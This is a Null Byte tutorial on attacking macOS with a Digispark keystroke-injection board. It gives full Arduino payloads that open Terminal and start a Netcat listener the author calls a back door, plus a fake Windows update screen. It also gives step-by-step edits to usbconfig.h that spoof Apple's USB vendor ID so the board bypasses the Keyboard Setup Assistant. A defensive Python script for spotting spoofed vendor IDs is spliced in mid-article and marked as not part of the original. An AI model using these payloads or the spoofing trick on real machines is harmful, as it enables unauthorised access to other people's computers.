How to Hack macOS with Digispark Ducky Script Payloads « Null Byte :: WonderHowTo



The USB Rubber Ducky and the Digispark board both run into the same problem when attacking macOS computers: a pop-up keyboard profiler that tries to identify non-Apple USB keyboards. Although it is a nasty disappointment, the fix is a simple tweak that lets the device target Macs without affecting its ability to target Windows and Linux devices.

Apple's profiler, the Keyboard Setup Assistant, is the window that opens when a non-Apple keyboard is connected to a MacBook, Mac Pro, iMac, etc., and attempts to identify the newly connected keyboard. This little-known security feature, which every macOS device runs in the background, protects against harmful payloads from devices like a $50 USB Rubber Ducky or Digispark. But it is easily bypassed by making the Mac believe your attack device is an Apple device.


macOS vs. HID Attacks

In the battle between Macs and HID (human interface device) attacks, we have macOS on one side with its Keyboard Setup Assistant profiler; on the other side are the Digispark and USB Rubber Ducky with a macOS payload to Rickroll the user.

When we plug a HID tool into a macOS computer, we are greeted by our nemesis, the keyboard profiler, before the payload has a chance to execute.

You can think of the Keyboard Setup Assistant as a kind of Clippy. It is supposed to help, but it actually makes things harder. Navigating the tool is also awful because it does not always profile the keyboard correctly. For example, it sometimes asks you to press keys again to profile the keyboard, which does not work with a device that cannot respond to feedback. It is better to go around it than to deal with it.

Banishing the Keyboard Profiler

To get rid of the Keyboard Setup Assistant profiler, we have to determine what it is complaining about. Deep in the Digispark library configuration files, the cause of our problem is the configuration option below.

  /* -------------------------- Device Description --------------------------- */

  #define USB_CFG_VENDOR_ID       0xc0, 0x16
  /* USB vendor ID for the device, low byte first. If you have registered your
   * own Vendor ID, define it here. Otherwise you may use one of obdev's free
   * shared VID/PID pairs. Be sure to read USB-IDs-for-free.txt for rules!
   * *** IMPORTANT NOTE ***
   * This template uses obdev's shared VID/PID pair for Vendor Class devices
   * with libusb: 0x16c0/0x5dc.  Use this VID/PID pair ONLY if you understand
   * the implications!
   */

The problem here is that the vendor ID "0xc0, 0x16" (0x16c0, obdev's shared vendor ID) is not Apple's. That is why macOS does not trust it and launches the Keyboard Setup Assistant to identify the intruder. To solve the problem, we can go into the Digispark library configuration and change the vendor ID to that of an Apple device. It still works fine against non-Apple devices, and the Keyboard Setup Assistant never runs because macOS recognizes the board as a fellow Apple product.

What You Need

A Digispark board. They can be purchased online for $2 to $4 each on Amazon or Walmart, and AliExpress prices are even lower. At the time of writing, Digistump, the official Digispark store, is sold out and will not be restocked until the beginning of 2020.

Connecting to the Digispark can differ slightly depending on the operating system you use. For more information and troubleshooting, consult the Digispark Wiki documentation.

Step 1: Install and Configure the Arduino IDE for the Digispark

Assuming you have the Arduino IDE installed, the next step is to add support for the Digispark board. I covered this process in detail in my previous guide on running USB Rubber Ducky scripts on a Digispark, so complete step 1 there before moving on to step 2 here.

Step 2: Create and Modify a Payload for macOS

To start, we will work with the stock "RickRoll_Update" payload from CedArctic on GitHub. In its first few actions, the payload is designed to press KEY_R and MOD_GUI_LEFT together to open a Run window, but this does not work on macOS because the shortcut keys are different.

  // This DigiSpark script opens Rick Astley's "Never Gonna Give You Up" and also a
  // fake Windows Update screen, then maximizes it with F11
  #include "DigiKeyboard.h"
  void setup() {
    // empty
  }
  void loop() {
    DigiKeyboard.delay(2000);
    DigiKeyboard.sendKeyStroke(0);                     // wake the host before typing so the first key is not dropped
    DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);   // Windows key + R opens the Run window
    DigiKeyboard.delay(600);
    DigiKeyboard.print("https://youtu.be/dQw4w9WgXcQ?t=43s");
    DigiKeyboard.sendKeyStroke(KEY_ENTER);
    DigiKeyboard.delay(5000);
    DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
    DigiKeyboard.delay(3000);
    DigiKeyboard.print("http://fakeupdate.net/win10u/index.html");
    DigiKeyboard.sendKeyStroke(KEY_ENTER);
    DigiKeyboard.delay(2000);
    DigiKeyboard.sendKeyStroke(KEY_F11);               // full-screen the fake update page
    for (;;) { /* empty */ }
  }

To change this, we need to adjust it to use the macOS shortcut for Spotlight Search, Command + Space, which is MOD_GUI_LEFT and KEY_SPACE respectively. Let's also change the payload so that Terminal is opened, a Netcat back door is started, Spotlight Search is opened again, and then the Rickroll happens. By opening a Netcat back door on top of Rickrolling, we can send junk over the network.

  #include "DigiKeyboard.h"
  void setup() {
    // empty
  }
  void loop() {
    DigiKeyboard.delay(2000);
    DigiKeyboard.sendKeyStroke(0);                       // wake the host before typing so the first key is not dropped
    DigiKeyboard.sendKeyStroke(KEY_SPACE, MOD_GUI_LEFT); // Command + Space opens Spotlight Search
    DigiKeyboard.delay(600);
    DigiKeyboard.print("terminal");                      // search for Terminal
    DigiKeyboard.sendKeyStroke(KEY_ENTER);               // open it
    DigiKeyboard.delay(5000);
    DigiKeyboard.print("nc -l 9999");                    // type the Netcat listener command
    DigiKeyboard.delay(1000);
    DigiKeyboard.sendKeyStroke(KEY_ENTER);
    DigiKeyboard.delay(600);
    DigiKeyboard.sendKeyStroke(KEY_SPACE, MOD_GUI_LEFT); // reopen Spotlight Search
    DigiKeyboard.delay(600);
    DigiKeyboard.print("https://youtu.be/dQw4w9WgXcQ?t=43s");
    DigiKeyboard.sendKeyStroke(KEY_ENTER);
    DigiKeyboard.delay(5000);
    for (;;) { /* empty */ }
  }

Perfect. The ".sendKeyStroke(KEY_SPACE, MOD_GUI_LEFT);" on line 8 calls up the Spotlight search bar. The ".print("terminal");" on line 10 searches for Terminal, while ".sendKeyStroke(KEY_ENTER);" opens it. The ".print("nc -l 9999");" line types the Netcat command, and Enter is pressed again so that we can do whatever we want on the Mac. Spotlight Search is then reopened and the YouTube video is searched for.

You could stop here, because the video plays directly in Spotlight Search, but if you press Enter it opens in a browser for a larger picture. Elegant.

Pro Tip: Find the Key Names for the Digispark

If you need the Digispark to hit different keys on the keyboard, use the following commands to open the "DigiKeyboard.h" file, which contains all the keys you can use, such as KEY_ENTER, KEY_ARROW_LEFT, MOD_CONTROL_LEFT, etc.

On macOS:

  ~$ nano ~/Library/Arduino15/packages/digistump/hardware/avr/1.6.7/libraries/DigisparkKeyboard/DigiKeyboard.h

On Linux:

  ~$ nano ~/.arduino15/packages/digistump/hardware/avr/1.6.7/libraries/DigisparkKeyboard/DigiKeyboard.h

Step 3: Change the usbconfig.h File

Now we have to change the configuration file before we push the code. Open a terminal window and use Nano to edit the following file:

On macOS:

  ~$ nano ~/Library/Arduino15/packages/digistump/hardware/avr/1.6.7/libraries/DigisparkKeyboard/usbconfig.h

On Linux:

  ~$ nano ~/.arduino15/packages/digistump/hardware/avr/1.6.7/libraries/DigisparkKeyboard/usbconfig.h

Navigate to the part of the file that contains the USB vendor ID and look for the following line:

  #define USB_CFG_VENDOR_ID       0xc0, 0x16

Now change the values to match the example below, which is the vendor ID of an Apple device, and save the file.

  #define USB_CFG_VENDOR_ID       0xac, 0x05

The section should now look like this:

  /* -------------------------- Device Description --------------------------- */

  #define USB_CFG_VENDOR_ID       0xac, 0x05
  /* USB vendor ID for the device, low byte first. If you have registered your
   * own Vendor ID, define it here. Otherwise you may use one of obdev's free
   * shared VID/PID pairs. Be sure to read USB-IDs-for-free.txt for rules!
   * *** IMPORTANT NOTE ***
   * This template uses obdev's shared VID/PID pair for Vendor Class devices
   * with libusb: 0x16c0/0x5dc.  Use this VID/PID pair ONLY if you understand
   * the implications!
   */

Once this is done, any code we push to the Digispark will identify itself to the host as an Apple device.
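As a defender's counterpart to the vendor-ID swap in this step and the explanation under "Banishing the Keyboard Profiler", here is an added Python example that is not part of the Null Byte article: it decodes a USB_CFG_VENDOR_ID define the way the board's firmware does (low byte first) and audits a USB device listing for keyboards that present Apple's vendor ID but carry a non-Apple manufacturer string, or that still use obdev's shared ID. The JSON layout is assumed to imitate the output of system_profiler's -json mode, and the device entries are constructed.

```python
# Added example (not Null Byte's code): flag USB devices that claim Apple's vendor ID but
# are not Apple, i.e. a Digispark after the usbconfig.h change. The JSON layout is assumed
# to imitate `system_profiler SPUSBDataType -json`; the sample data is constructed.
import json
import re

APPLE_VID = 0x05AC         # what the article writes as "0xac, 0x05" (low byte first)
OBDEV_SHARED_VID = 0x16C0  # the Digispark default, written as "0xc0, 0x16"

def vid_from_define(line):
    """Decode a V-USB '#define USB_CFG_VENDOR_ID 0xac, 0x05' line into the 16-bit VID."""
    m = re.match(r"\s*#define\s+USB_CFG_VENDOR_ID\s+0x([0-9a-fA-F]{2})\s*,\s*0x([0-9a-fA-F]{2})", line)
    if not m:
        raise ValueError("not a USB_CFG_VENDOR_ID define: %r" % line)
    low, high = int(m.group(1), 16), int(m.group(2), 16)
    return (high << 8) | low

def _walk(items):
    """Yield every entry, descending into hubs' nested "_items" lists."""
    for item in items:
        yield item
        yield from _walk(item.get("_items", []))

def suspicious_keyboards(profile):
    """Return (name, vid, manufacturer, reason) for devices whose identity looks spoofed."""
    findings = []
    for dev in _walk(profile.get("SPUSBDataType", [])):
        if "vendor_id" not in dev:
            continue  # a bus entry, not a device
        # system_profiler formats IDs as "0x05ac  (Apple Inc.)"; keep only the number
        vid = int(str(dev["vendor_id"]).split()[0], 16)
        manu = dev.get("manufacturer", "")
        if vid == OBDEV_SHARED_VID:
            findings.append((dev["_name"], vid, manu, "obdev shared VID used by V-USB/Digispark"))
        elif vid == APPLE_VID and not manu.startswith("Apple"):
            findings.append((dev["_name"], vid, manu, "Apple VID but non-Apple manufacturer string"))
    return findings

# Constructed sample: a genuine Magic Keyboard plus a Digispark with the spoofed vendor ID
SAMPLE = json.loads("""{"SPUSBDataType": [{"_name": "USB31Bus", "_items": [
  {"_name": "Magic Keyboard", "vendor_id": "0x05ac  (Apple Inc.)", "product_id": "0x026c", "manufacturer": "Apple Inc."},
  {"_name": "DigiKey", "vendor_id": "0x05ac  (Apple Inc.)", "product_id": "0x27db", "manufacturer": "digistump.com"}
]}]}""")

if __name__ == "__main__":
    for name, vid, manu, why in suspicious_keyboards(SAMPLE):
        print(f"{name}: VID 0x{vid:04x} ({manu!r}) - {why}")
```

The manufacturer string lives in the same usbconfig.h and can be edited just as easily as the vendor ID, so treat a clean result as weak evidence and a hit as something worth a closer look.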

Step 4: Push the Payload & Test It

Finally, we have to push the code to the Digispark to make it work. To do this, click the right arrow in the upper left corner of the script window in the Arduino IDE to compile the code. In the window below, Arduino will instruct you to plug in the Digispark within 60 seconds.

If you see output like the below, you did it! If not, try unplugging the Digispark and retrying the upload. You may also need to wiggle the Digispark slightly in the USB port to make contact, depending on the type of port your computer uses.

To see the full effect of the payload, you can watch the video above. We sent a binary file over the network, which produced a lot of noise and alarming text on the screen, but you can do whatever you want.

It Is Easy to Make macOS Payloads for the Digispark

Although macOS appears to have a security advantage over computers that fall easy prey to HID attacks, the advantage is negligible at best. With our simple modification, any computer can be targeted, and macOS is just as vulnerable once it thinks it is talking to another Apple device.

Make sure you close your laptop if you leave it unattended, although I wouldn't worry about someone sneaking a Digispark into it. Unlike the USB Rubber Ducky, which is designed to pass as a USB flash drive, the Digispark looks suspicious and alarming, which often makes it a better tool for developing payloads than for actually delivering them.

I hope you enjoyed this guide to setting up the cheap Digispark to attack macOS devices! If you have any questions about this tutorial on configuring the Digispark, leave a comment below, and feel free to reach me on Twitter @KodyKinzie.

Don't Miss: Modify the USB Rubber Ducky with Custom Firmware


Cover photo and screenshots by Kody/Null Byte
